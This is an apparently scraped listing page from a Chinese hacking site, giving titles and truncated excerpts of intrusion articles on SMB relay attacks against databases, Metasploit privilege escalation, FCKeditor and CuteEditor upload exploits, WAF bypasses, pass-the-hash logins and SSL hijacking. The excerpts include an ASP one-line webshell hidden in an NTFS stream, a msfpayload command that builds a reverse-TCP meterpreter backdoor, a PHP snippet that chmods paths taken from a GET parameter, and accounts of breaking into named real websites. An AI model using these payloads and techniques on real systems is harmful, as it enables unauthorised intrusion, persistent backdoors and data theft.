|
|
PostgreSQL Database SMBRelay AttAck
|
|
日期:2012-02-14 12:27:36
点击:95 评论:0
|
前面说了MYSQL的,现在来说postgres ,只需要是postgres数据库用户就能成功的进行攻击,老样子先构造个SMB SERVER。 看数据库的启动权限是默认的: 恩,不用注入点了,搭建环境费时间, msf use auxiliary /server/capture/smb msf auxiliary(smb) exploit [*] Auxiliar |
|
|
Mysql Database SMBRelay AttAck
|
|
日期:2012-02-14 12:26:28
点击:213 评论:1
|
大家好,今天来更正我以前写的文章Databases SMBRelay AttAck,文章的内容介绍了针对MYSQL MSSQL PG三种数据库的SMBRelay AttAck,但是以前的博客数据丢失。如果谁保存了这篇请发给我。 (找出错别字留言,一个错别字一个九区邀请码) 当时介绍到MYSQL SMBRELAY ATTACK |
|
|
使用低权限 Oracle 数据库账户得到 OS 访问权限
|
|
日期:2012-02-14 12:24:35
点击:82 评论:0
|
作者:Mickey 这几天看了篇叫Penetration: from application down to OS (Oracle)的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrel |
|
|
Metasploit 权限提升
|
|
日期:2012-02-13 11:05:00
点击:1384 评论:0
|
前言 大家好,我是新加入的成员arus7,感谢炊爷的批准,让我加入了九区精子联盟 攻击 首先我虚拟机的APACHE是以非系统权限启动的 我们来生成一个Door root@Dis9Team:~$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x /var/www/door |
|
|
CNBETA第一次渗透纪实
|
|
日期:2011-12-08 10:54:09
点击:115 评论:0
|
简要描述: 去年进行的第一次渗透,非常简单。 详细说明: cnBeta是互联网IT新闻业界的后起之秀,是目前国内同行领先的即时新闻站点和网友交流平台。消息速度快,报导立场公正中立,网友讨论气氛浓厚,在 IT业界拥有相当的影响力。随后站点管理人员不断探索,在站点代码 |
|
|
linux不提权跨目录访问的代码
|
|
日期:2011-12-05 11:32:01
点击:60 评论:0
|
linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。 代码如下: ?php $path = stripslashes($_GET ['path'] ); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permi |
|
|
友情检测红黑联盟
|
|
日期:2011-11-07 12:03:05
点击:333 评论:0
|
友情检测红黑联盟[r00ts Security Team] 作者:落泪红尘 注明:r00ts Security Team 博客: http://hi.baidu.com/r00ts ======================================================= 今天大哥红颜说没事做,太阳个站把, 我说好吧,求目标,他就发了 www.2cto.com 的站点 |
|
|
破解MSSQL中的HASH密码
|
|
日期:2011-11-03 14:13:39
点击:113 评论:0
|
今天攻击一个网站的时候遇到了MSSQL的HASH密码,在网上转了一大圈,找到一篇文章讲述的比较详细,与大家分享下~~~ SQL服务器是怎样储存密码的? SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发现这个hash储存在mater数据库 |
|
|
Understanding MD5 Length Extension Attack
|
|
日期:2011-09-21 12:28:05
点击:188 评论:0
|
背景 在2009年, Thai Duong 与Juliano Rizzo 不仅仅发布了ASP.NET的padding oracle攻击,同时还写了一篇关于 Flickr API签名可伪造的paper ,和padding oracle的paper放在一起。因为Flickr API签名的这个漏洞,也是需要用到padding的。 两年过去了,在安全圈子(国内 |
|
|
利用ntfs流隐藏你的一句话木马
|
|
日期:2011-09-16 09:02:11
点击:101 评论:0
|
这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好! 如下是ASP脚本的例子! NTFS流文件的内容如下 % re= request(test) if re then execute re response.end '表示结束,不再处理别的代码 end if % 把内容写入如下位置(示例位置) H:Web |
|
|
一次真正的WEB2.0渗透全过程
|
|
日期:2011-09-15 11:52:22
点击:107 评论:0
|
目标是一个大型在线论坛,论坛程序是某著名BBS程序二次开发版,需要得到目标服务器webshell,针对论坛的主站进行各种测试,未发现明显漏洞。 于是开始DNS FUZZ,发现有个子域名指向的另外的服务器存在一套WEB MAIL程序,通过社工的方式GOOGLE搜索到了该邮箱的多个账号 |
|
|
利用WMI打造完美“三无”后门
|
|
日期:2011-09-08 10:50:10
点击:857 评论:0
|
Welcome!各位ScriptKid,欢迎来到脚本世界。从今天开始小弟我会连载这篇《利用WMI打造完美三无后门》。 序章 在正式开始之前,请允许小弟先介绍一下时代背景,人物性格。 这个后门完成于2006年的这个时候。其主要的思路来自于zzzevazzz大虾的《深入挖掘windows脚本技术 |
|
|
速8连锁酒店内网配置不当
|
|
日期:2011-09-07 14:22:08
点击:159 评论:0
|
简要描述: 从一个分站的fckeditor编辑器获取webshell,进一步提升权限。虽然该台服务器处于dmz区域内,无法直接访问内网,但是通过翻阅大量数据库连接信息找到一台和内网有联系的主机,然后进一步渗透,从而控制super8整个域内网。 详细说明: 速8好像很多站都用了fck |
|
|
浅谈绕过WAF的数种方法
|
|
日期:2011-09-07 10:41:56
点击:81 评论:0
|
EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-09-06 From: http://www.80sec.com/?p=244 000 前言 08年初诞生了一种SQL群注攻击,黑客在全球范围内对asp,asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入,黑客通过一条结合游标 |
|
|
cuteeditor编辑器利用方法两则
|
|
日期:2011-08-29 10:34:26
点击:76 评论:0
|
方法1.直接下载load.ashx配置文件 http://www.badguest.cn /CuteSoft_Client/CuteEditor/Load.ashx?type=imagefile=../../../web.config 然后查看一些sql配置信息 从sql数据库连接入手 connectionStrings add name=ynncConnectionString connectionString=Server=.;Dat |
|
|
FCKeditor编辑器全部版本另类上传漏洞
|
|
日期:2011-08-29 10:33:28
点击:284 评论:0
|
FCKeditor all versian Arbitrary File Upload Vulnerability 发布时间: 2011 源码地址:http://sourceforge.net/projects/fckeditor/ 漏洞作者: pentesters.ir 利用步骤: 1.创建一个htaccess文件: 代码内容: FilesMatch _php.gif SetHandler application/x-httpd-php / |
|
|
Apache Range Header DoS Attack 科普
|
|
日期:2011-08-26 14:27:56
点击:285 评论:0
|
这两天Apache 暴出了一个DOS 0DAY,攻击非常简单,构造一个特殊的Range头即可实施攻击,关于Range头的作用,可以参照rfc文档的14.35节 http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html 。 一. Range头主要用于断点续传,比如服务器有一个文件,9个字节,尝试 |
|
|
Access溢出+跨裤得到shell
|
|
日期:2011-08-25 12:57:55
点击:153 评论:0
|
最近入侵了一个ACCESS的站,把得到的一些想法记录下来: 这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint..... 我只 |
|
|
Metasploit使用hash直接登录系统
|
|
日期:2011-08-15 11:04:09
点击:228 评论:0
|
其实Metasploit 早就被Rapid7收购了,好像没什么人知道,呵呵,Metasploit 专业版就是收购后发布出来的。 抓到管理员的密码hash根本不用破解,直接就可以登录。 use windows/smb/psexec set SMBUser akast set SMBPass 用户密码的hash值 set payload Windows/meterpret |
|
|
SSL劫持攻击
|
|
日期:2011-08-11 16:22:02
点击:192 评论:0
|
Copyright (c) 2011 Czy Invicta Hack01@Live!cn All rights reserved. SSL和HTTPS ~~~~~~~~~~~~~ 在这篇文章中,我们将利用SSL攻击众所周知的HTTPS。在日常生活中经常使用HTTPS,例如电子邮件服务和网上银行的应用 都依赖于HTTPS加密,以确保Web浏览器和他们的服务器 |
|
|
|
|
本月热点文章 |
|
|
|
|
|
本月推荐文章 |
|
|
|
|
|
相关分类 |
|
|
|
|